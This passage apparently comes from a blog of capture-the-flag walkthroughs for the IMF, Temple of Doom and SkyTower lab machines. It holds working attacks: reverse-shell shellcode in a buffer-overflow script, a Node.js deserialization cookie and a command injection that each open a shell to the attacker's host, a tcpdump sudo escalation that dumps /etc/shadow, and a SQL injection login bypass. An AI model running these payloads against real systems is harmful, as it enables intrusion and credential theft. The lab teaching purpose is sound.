0024| 0xffffd318 (“g5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
0028| 0xffffd31c (“6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9”)
[——————————————————————————]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41366641 in ?? ()

gdb-peda$ info frame
Stack level 0, frame at 0xffffd304:
eip = 0x41366641; saved eip = 0x66413766
called by frame at 0xffffd308
Arglist at 0xffffd2fc, args:
Locals at 0xffffd2fc, Previous frame’s sp is 0xffffd304
Saved registers:
eip at 0xffffd300

Then trying to identify then length of the buffer:

root@kali:~/boxes/imf# /usr/bin/msf-pattern_offset -q 41366641
[*] Exact match at offset 168

So now I can start building the exploit:

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.0.11 LPORT=4444 -f python -b “\x00\x0a\x0d”
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 95 (iteration=0)
x86/shikata_ga_nai chosen with final size 95
Payload size: 95 bytes
Final size of python file: 479 bytes
buf = b””
buf += b”\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b”
buf += b”\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e”
buf += b”\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34″
buf += b”\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc”
buf += b”\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94″
buf += b”\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21″
buf += b”\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5″
buf += b”\x30\x66\x4d\x86″

Let build exploit.py:

I will run it from my Kali box as the target has only python3… And I have issues when trying to concatenate bytes and text!

#!/usr/bin/python
import sockethost = “192.168.0.18”
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 7788))
s.recv(1024)
#Sending the Agent ID
s.send(“48093572\n”)
s.recv(1024)
#Select menu option 3
s.send(“3\n”)
s.recv(1024)ret = “\x63\x85\x04\x08”
buf = “”
buf += b”\xbf\x55\xf0\xbc\x40\xda\xcc\xd9\x74\x24\xf4\x5a\x2b”
buf += b”\xc9\xb1\x12\x31\x7a\x12\x83\xc2\x04\x03\x2f\xfe\x5e”
buf += b”\xb5\xfe\x25\x69\xd5\x53\x99\xc5\x70\x51\x94\x0b\x34″
buf += b”\x33\x6b\x4b\xa6\xe2\xc3\x73\x04\x94\x6d\xf5\x6f\xfc”
buf += b”\xad\xad\x90\xf7\x45\xac\x90\x16\xca\x39\x71\xa8\x94″
buf += b”\x69\x23\x9b\xeb\x89\x4a\xfa\xc1\x0e\x1e\x94\xb7\x21″
buf += b”\xec\x0c\x20\x11\x3d\xae\xd9\xe4\xa2\x7c\x49\x7e\xc5″
buf += b”\x30\x66\x4d\x86″
#Adding NOPs
pad = “\x90” * 73
buffer = buf + pad + ret
s.send(buffer)
s.recv(1024)

./exploit.py

Bingo!

root@kali:~/boxes/imf# nc -nvlp 4444
listening on [any] 4444 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.18] 54970
id
uid=0(root) gid=0(root) groups=0(root)

cd /root
ls
Flag.txt
TheEnd.txt

cat Flag.txt
flag6{R2gwc3RQcm90MGMwbHM=}

cat TheEnd.txt
____ _ __ __
/ _/_ _ ___ ___ ___ ___ (_) / / /__
_/ // ‘ \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
/___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
__ __/_/ _
/ |/ (_)__ ___ (_)__ ___
/ /|_/ / (_-<(_-</ / _ \/ _ \
/_/__/_/_/___/___/_/\___/_//_/
/ __/__ ___________
/ _// _ \/ __/ __/ -_)
/_/ \___/_/ \__/\__/

Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
Thank you for trying this challenge and please send any feedback.

Geckom
Twitter: @g3ck0ma
Email: geckom@redteamr.com
Web: http://redteamr.com

Special Thanks
Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
Web Advice: Menztrual (@menztrual)
Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)

 

 

All the flags and their decoded version:

flag1{YWxsdGhlZmlsZXM=}
allthefiles

flag2{aW1mYWRtaW5pc3RyYXRvcg==}
imfadministrator

flag3{Y29udGludWVUT2Ntcw==}
continueTOcms

flag4{dXBsb2Fkcjk0Mi5waHA=}
uploadr942.php

flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices

flag6{R2gwc3RQcm90MGMwbHM=}
Gh0stProt0c0ls

The Temple of Doom

Found the target at 192.168.1.138..

So now let’s scan it quickly:

root@kali:~# nmap -sC -sV 192.168.1.138
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 20:47 UTC
Nmap scan report for 192.168.1.138
Host is up (0.00026s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn’t have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:6E:99:04 (Oracle VirtualBox virtual NIC)

Love the 666 port !!!!! Let’s check it:

ok not much…. Need to enumerate more:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt –url http://192.168.1.138:666 > directories

more directories
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.138:666
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/09/10 20:54:17 Starting gobuster
===============================================================
===============================================================
2019/09/10 20:55:12 Finished
===============================================================

And NIKTO:

nikto -url http://192.168.1.138:666
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.138
+ Target Hostname: 192.168.1.138
+ Target Port: 666
+ Start Time: 2019-09-10 20:55:04 (GMT0)
—————————————————————————
+ Server: No banner retrieved
+ Retrieved x-powered-by header: Express
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use ‘-C all’ to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 5 item(s) reported on remote host
+ End Time: 2019-09-10 20:55:13 (GMT0) (9 seconds)
—————————————————————————

Not really lucky for now….

Searchsploit was not very helpfull so let’s try BURP:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”

So let’s see what’s in the cookie… I decoded it (Base 64) with Burp:

{“username”:”Admin”,”csrftoken”:”u32t4o3tb3gg431fs34ggdgchjwnza0l=”,”Expires=”:Friday, 13 Oct 2018 00:00:00 GMTIn0%3D

So now I have a username and a token…

With Burp, I tried to pass just the username value:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6IkFkbWluIn0=
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”

And I have a welcome page:

Let’s try to have a shell. Maybe we can have execute permission:

Creating a payload

{“username”:”_$$ND_FUNC$$_function(){return require(‘child_process’).execSync(‘nc 192.168.1.123 4444 -e /bin/sh’,(e,out,err)=>{console.log(out);}); }()”}

Then Base64 encode

Then on Kali:

nc -nlvp 4444
listening on [any] 4444 …

Then in Burp:

GET / HTTP/1.1
Host: 192.168.1.138:666
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: profile=eyJ1c2VybmFtZSI6Il8kJE5EX0ZVTkMkJF9mdW5jdGlvbigpe3JldHVybiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlY1N5bmMoJ25jIDE5Mi4xNjguMS4xMjMgNDQ0NCAtZSAvYmluL3NoJywoZSxvdXQsZXJyKT0+e2NvbnNvbGUubG9nKG91dCk7fSk7IH0oKSJ9
Connection: close
Upgrade-Insecure-Requests: 1
If-None-Match: W/”24-xWt5IUP3GfGbHraPgY5EGPpcNzA”

Bingo a shell!

connect to [192.168.1.123] from (UNKNOWN) [192.168.1.138] 47718
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)

So as usual, let’s upgrade:

python -c ‘import pty; pty.spawn(“/bin/bash”)’
[nodeadmin@localhost ~]$

CTRL Z
stty raw -echo
fg and two times ENTER

export TERM=screen
reset

Then trying sudo -l in case of…

[nodeadmin@localhost ~]$ ll /usr/bin/sudo -l
—s–x–x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo

So I uploaded linenum:

on Kali:

root@kali:~/tools# python -m SimpleHTTPServer 9000
Serving HTTP on 0.0.0.0 port 9000 …

On the target:

wget http://192.168.1.123:9000/linenum.sh
wget http://192.168.1.123:9000/linenum.sh
–2019-09-12 13:24:23– http://192.168.1.123:9000/linenum.sh
Connecting to 192.168.1.123:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 45652 (45K) [text/x-sh]
Saving to: ‘linenum.sh’

linenum.sh 100%[===================>] 44.58K –.-KB/s in 0s

2019-09-12 13:24:23 (410 MB/s) – ‘linenum.sh’ saved [45652/45652]

[nodeadmin@localhost ~]$ ll
ll
total 88
drwx——. 5 nodeadmin nodeadmin 4096 Sep 12 13:24 .
drwxr-xr-x. 4 root root 4096 Jun 2 2018 ..
-rw——-. 1 nodeadmin nodeadmin 1 Jun 7 2018 .bash_history
-rw-r–r–. 1 nodeadmin nodeadmin 18 Mar 15 2018 .bash_logout
-rw-r–r–. 1 nodeadmin nodeadmin 193 Mar 15 2018 .bash_profile
-rw-r–r–. 1 nodeadmin nodeadmin 231 Mar 15 2018 .bashrc
drwx—— 3 nodeadmin nodeadmin 4096 Jun 1 2018 .config
-rw——- 1 nodeadmin nodeadmin 16 Jun 3 2018 .esd_auth
drwxr-xr-x 4 nodeadmin nodeadmin 4096 Jun 3 2018 .forever
-rw-rw-r– 1 nodeadmin nodeadmin 45652 Jul 16 12:58 linenum.sh
drwxrwxr-x. 3 nodeadmin nodeadmin 4096 May 30 2018 .web

[nodeadmin@localhost ~]$ chmod +x linenum.sh
chmod +x linenum.sh
[nodeadmin@localhost ~]$ ./linenum.sh -t > enum

[-] Kernel information:
Linux localhost.localdomain 4.16.3-301.fc28.x86_64 #1 SMP Mon Apr 23 21:59:58 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

[-] Specific release information:
Fedora release 28 (Twenty Eight)
NAME=Fedora
VERSION=”28 (Workstation Edition)”
ID=fedora
VERSION_ID=28
PLATFORM_ID=”platform:f28″
PRETTY_NAME=”Fedora 28 (Workstation Edition)”

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r–r–. 1 root root 0 Feb 7 2018 /etc/cron.deny
-rw-r–r–. 1 root root 451 Feb 7 2018 /etc/crontab

/etc/cron.d:
total 24
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rw-r–r–. 1 root root 128 Feb 7 2018 0hourly
-rw-r–r–. 1 root root 108 Aug 3 2017 raid-check

/etc/cron.daily:
total 28
drwxr-xr-x. 2 root root 4096 Jun 7 2018 .
–More–(72%)
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 2239 Feb 7 2018 certwatch
-rwxr-xr-x 1 root root 232 Apr 19 2018 exim-tidydb
-rwxr-xr-x. 1 root root 189 Jan 4 2018 logrotate

/etc/cron.hourly:
total 20
drwxr-xr-x. 2 root root 4096 Apr 25 2018 .
drwxr-xr-x. 135 root root 12288 Sep 10 19:35 ..
-rwxr-xr-x. 1 root root 575 Feb 7 2018 0anacron

### INTERESTING FILES ####################################
[-] Useful file locations:
/usr/bin/nc
/usr/bin/wget
/usr/bin/curl

[-] SUID files:
-rws–x–x. 1 root root 41496 Feb 23 2018 /usr/sbin/userhelper
-rwsr-xr-x. 1 root root 11720 Feb 8 2018 /usr/sbin/pam_timestamp_check
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet
-rwsr-xr-x. 1 root root 11768 Feb 9 2018 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 1408432 Apr 19 2018 /usr/sbin/exim
-rwsr-xr-x. 1 root root 123944 Apr 11 2018 /usr/sbin/mount.nfs
-rwsr-xr-x. 1 root root 38080 Feb 8 2018 /usr/sbin/unix_chkpwd
-rwsr-xr-x. 1 root root 20224 Mar 21 2018 /usr/libexec/gstreamer-1.0/gst-ptp-helper
-rwsr-xr-x. 1 root root 11952 Apr 12 2018 /usr/libexec/Xorg.wrap
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwsr-x—. 1 root dbus 57960 Oct 30 2017 /usr/libexec/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x. 1 root root 44160 Feb 6 2018 /usr/bin/newgidmap
-rwsr-xr-x. 1 root root 32848 Feb 7 2018 /usr/bin/fusermount
-rws–x–x. 1 root root 25936 Mar 27 2018 /usr/bin/chsh
-rwsr-xr-x. 1 root root 59752 Feb 7 2018 /usr/bin/crontab
-rwsr-xr-x. 1 root root 50304 Mar 27 2018 /usr/bin/mount
-rwsr-xr-x. 1 root root 55440 Feb 25 2018 /usr/bin/at
-rwsr-xr-x. 1 root root 46328 Mar 27 2018 /usr/bin/su
-rwsr-xr-x. 1 root root 33136 Mar 27 2018 /usr/bin/umount
-rwsr-xr-x. 1 root root 44168 Feb 6 2018 /usr/bin/newuidmap
-rwsr-xr-x. 1 root root 28168 Apr 4 2018 /usr/bin/pkexec
-rws–x–x. 1 root root 30536 Mar 27 2018 /usr/bin/chfn
-rwsr-xr-x. 1 root root 89296 Feb 6 2018 /usr/bin/gpasswd
—s–x–x. 1 root root 158608 Feb 9 2018 /usr/bin/sudo
-rwsr-xr-x. 1 root root 29008 Apr 12 2018 /usr/bin/passwd
-rwsr-xr-x. 1 root root 82040 Feb 6 2018 /usr/bin/chage
-rwsr-xr-x. 1 root root 49432 Feb 6 2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 10480 Jun 1 2018 /usr/local/lib/authbind/helper
-rwsr-xr-x. 1 root root 16304 Apr 4 2018 /usr/lib/polkit-1/polkit-agent-helper-1

[+] Possibly interesting SUID files:
-rwsr-xr-x. 1 root root 28280 Aug 27 2017 /usr/sbin/mtr-packet

[-] SGID files:
-rwxr-sr-x. 1 root root 7608 Feb 9 2018 /usr/sbin/netreport
-rwx–s–x. 1 root lock 16024 Apr 12 2018 /usr/sbin/lockdev
-rwx–s–x. 1 root utmp 11704 Feb 26 2018 /usr/libexec/utempter/utempter
-r-xr-sr-x. 1 root ssh_keys 468032 Apr 12 2018 /usr/libexec/openssh/ssh-keysign
-rwsr-sr-x. 1 abrt abrt 15856 Mar 27 2018 /usr/libexec/abrt-action-install-debuginfo-to-abrt-cache
-rwxr-sr-x. 1 root tty 20408 Mar 27 2018 /usr/bin/write
-rwx–s–x. 1 root slocate 45064 Feb 9 2018 /usr/bin/locate

Nothing really juiciy…. However I noticed that Pulse audio is running…
searchsploit has an exploit for it:
PulseAudio setuid – Local Privilege Escalation | exploits/linux/local/9207.sh

However gcc is not on the target so I modified the exploit to cmpile it on my 64bits machines:

gcc -m32 -o $workdir/pa_race $workdir/pa_race.c
gcc -m32 -o $workdir/sh $workdir/sh.c

#$workdir/pa_race

Then change dir to /tmp and started an http server:

python -m SimpleHTTPServer 9000

Then on the target:

nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/sh
–2019-09-16 10:37:03– http://192.168.0.11:9000/sh
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 15604 (15K) [application/octet-stream]
Saving to: ‘sh’

sh 100%[===================>] 15.24K –.-KB/s in 0s

2019-09-16 10:37:03 (178 MB/s) – ‘sh’ saved [15604/15604]

[nodeadmin@localhost ~]$ wget http://192.168.0.11:9000/pa_race
–2019-09-16 10:37:09– http://192.168.0.11:9000/pa_race
Connecting to 192.168.0.11:9000… connected.
HTTP request sent, awaiting response… 200 OK
Length: 15896 (16K) [application/octet-stream]
Saving to: ‘pa_race’

pa_race 100%[===================>] 15.52K –.-KB/s in 0s

2019-09-16 10:37:09 (250 MB/s) – ‘pa_race’ saved [15896/15896]

Then:

[nodeadmin@localhost ~]$ chmod +x sh
[nodeadmin@localhost ~]$ chmod +x pa_race
[nodeadmin@localhost ~]$ ./pa_race
link: Invalid cross-device link

CRAP!

Ok, if I do a ps-ax, I see that ss-manager is running as fireman..
Let’s try this:

nc -u 127.0.0.1 8839
add: {“server_port”:8003, “password”:”test”, “method”:”||chmod -R 777 /home/fireman||”}
ok^C
[nodeadmin@localhost home]$ ll
total 8
drwxrwxrwx 6 fireman fireman 4096 Jun 7 2018 fireman
drwx——. 6 nodeadmin nodeadmin 4096 Sep 16 10:49 nodeadmin
[nodeadmin@localhost home]$ cd fireman
[nodeadmin@localhost fireman]$ ll
total 0

Ok nothing in Fireman’s home….

So let’s have a shell with fireman…. I saw in his history that he can do sudo -l

nc -u 127.0.0.1 8839
add: {“server_port”:8003, “password”:”test”, “method”:”||bash -i >& /dev/tcp/192.168.0.11/8080 0>&1||”}

On Kali: nc -lnvp 8080

root@kali:~/boxes/doom# nc -nvlp 8080
listening on [any] 8080 …
connect to [192.168.0.11] from (UNKNOWN) [192.168.0.16] 42730
bash: cannot set terminal process group (842): Inappropriate ioctl for device
bash: no job control in this shell
[fireman@localhost root]$ id
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost root]$

Interesting!

[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep=”COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS”, env_keep+=”MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE”, env_keep+=”LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES”, env_keep+=”LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE”, env_keep+=”LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY”,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump

Ok so lt’s use tcpdump to execute commands:

echo $’id\ncat /etc/shadow’ > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/.test -Z root

root:$6$jA85omnRVznNFM4j$voN29bYWJUlRbxgsqia46oC9IK/mdRK5B.IYUrJYs196sfA3ye3rSV790EoD76ABKu29CdtnAXQtIAo6OpNWc1:17681:0:99999:7:::

So let’s try a reverse shell:

I create /tmp/root with:
nc -e /bin/sh 192.168.0.16 8090

Then nc -nvlp 8090 on the localhost
and in my fireman shell:
sudo tcpdump -ln -i eth0 -w /dev/null -G 1 -z /tmp/root -Z root

whoami
root

cat flag.txt
[+] You’re a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.

+—————————————————————————–+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| — | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|–__ | — |\________________________________/~~\~~| / \ / \ |
| |~~–__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~–_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|—-| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_–~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __–P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+—————————————————————————–+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| …. ……… |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| …. ……… |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| …. ……… |
+—————————————————————————–+

FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther

SkyTower

Looking for the box first:

nmap -Pn -T4 192.168.1.0/24

Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00042s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
3128/tcp open squid-http
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

So let’s run a more intense scan while I check the website:

nmap -p- -sV 192.168.1.188
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-29 14:29 UTC
Nmap scan report for SkyTower.lan (192.168.1.188)
Host is up (0.00044s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.2.22 ((Debian))
3128/tcp open http-proxy Squid http proxy 3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds

So let’s go to the website:

The one on 3128 is showing an error message:

Nikto doesn’t reveal a lot:

nikto -h http://192.168.1.188
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.1.188
+ Target Hostname: 192.168.1.188
+ Target Port: 80
+ Start Time: 2019-08-29 14:33:26 (GMT0)
—————————————————————————
+ Server: Apache/2.2.22 (Debian)
+ Server may leak inodes via ETags, header found with file /, inode: 87, size: 1136, mtime: Fri Jun 20 11:23:36 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Uncommon header ‘tcn’ found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for ‘index’ were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST
+ Retrieved x-powered-by header: PHP/5.4.4-14+deb7u9
+ OSVDB-3233: /icons/README: Apache default file found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 20 error(s) and 10 item(s) reported on remote host
+ End Time: 2019-08-29 14:44:30 (GMT0) (664 seconds)
—————————————————————————

I also checked exploitdb for squid but nothing really interesting there.

GOBUSTER did<nt find much either:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.188
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.1.188
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2019/08/30 20:03:24 Starting gobuster
===============================================================
/index (Status: 200)
/background (Status: 200)
/background2 (Status: 200)
/server-status (Status: 403)
===============================================================
2019/08/30 20:04:50 Finished

Nothing in the images:

root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done
root@kali:~/boxes/skytower# /root/tools/stegextract/stegextract background2.jpeg
Detected image format: JPG
No trailing data found in file
Performing deep analysis
Done

Cheking the login page with BURP:

POST /login.php HTTP/1.1
Host: 192.168.1.188
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.188/

Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Connection: close
Upgrade-Insecure-Requests: 1

email=’*&password=’*

Yep, SQL injection works!

HTTP/1.1 200 OK
Date: Thu, 29 Aug 2019 19:27:42 GMT
Server: Apache/2.2.22 (Debian)
X-Powered-By: PHP/5.4.4-14+deb7u9
Vary: Accept-Encoding
Content-Length: 1626
Connection: close
Content-Type: text/html

<HTML>
<div style=”height:100%; width:100%;background-image:url(‘background.jpg’);
background-size:100%;
background-position:50% 50%;
background-repeat:no-repeat;”>
<div style=”
padding-right:8px;
padding-left:10px;
padding-top: 10px;
padding-bottom: 10px;
background-color:white;
border-color: #000000;
border-width: 5px;
border-style: solid;
width: 400px;
height:430px;
position:absolute;
top:50%;
left:50%;
margin-top:-215px; /* this is half the height of your div*/
margin-left:-200px;
“>
<br><strong><font size=4>Welcome john@skytech.com</font><br /> </br></strong>As you may know, SkyTech has ceased all international operations.<br><br> To all our long term employees, we wish to convey our thanks for your dedication and hard work.<br><br><strong>Unfortunately, all international contracts, including yours have been terminated.</strong><br><br> The remainder of your contract and retirement fund, <strong>$2</strong> ,has been payed out in full to a secure account. For security reasons, you must login to the SkyTech server via SSH to access the account details.<br><br><strong>Username: john</strong><br><strong>Password: hereisjohn</strong> <br><br> We wish you the best of luck in your future endeavors. <br> </div> </div></HTML>

Good info:

Username: john
Password: hereisjohn

So let’s try with ssh — Oh crap… I can’t… ssh is filtered!

So maybe I can connect using SQUID…

proxytunnel -p 192.168.1.188:3128 -d 127.0.0.1:22 -a 4444

Then open a new terminal and:

ssh john@127.0.0.1 -p 4444 “/bin/bash”

BINGO

ssh john@127.0.0.1 -p 4444 “/bin/bash”
john@127.0.0.1’s password:

id
uid=1000(john) gid=1000(john) groups=1000(john)
fg
/bin/sh: 3: fg: No current job
is
/bin/sh: 4: is: not found
ls
whoami
john
id
uid=1000(john) gid=1000(john) groups=1000(john)

Shell is not very good but let’s try to move forward…

Checking home:
ls -al
total 20
drwxr-xr-x 5 root root 4096 Jun 20 2014 .
drwxr-xr-x 24 root root 4096 Jun 20 2014 ..
drwx—— 2 john john 4096 Jun 20 2014 john
drwx—— 2 sara sara 4096 Jun 20 2014 sara
drwx—— 2 william william 4096 Jun 20 2014 william

Nothing… so let’s check the website:

cd /var/www
ls -al
total 5300
drwxr-xr-x 2 root root 4096 Jun 20 2014 .
drwxr-xr-x 12 root root 4096 Jun 20 2014 ..
-rwxr–r– 1 root root 2831446 Jun 20 2014 background2.jpg
-rwxr–r– 1 root root 2572609 Jun 20 2014 background.jpg
-rwxr–r– 1 root root 1136 Jun 20 2014 index.html
-rwxr–r– 1 root root 2393 Jun 20 2014 login.php
cat login.php
<?php

$db = new mysqli(‘localhost’, ‘root’, ‘root’, ‘SkyTech’);

BINGO:

OK pissed with this crappy shell…

/bin/sh -i
/bin/sh: 0: can’t access tty; job control turned off
$ id
uid=1000(john) gid=1000(john) groups=1000(john)
$

ok now we’re talking!!!!!

So I uploaded an ran lienum..

[-] Specific release information:
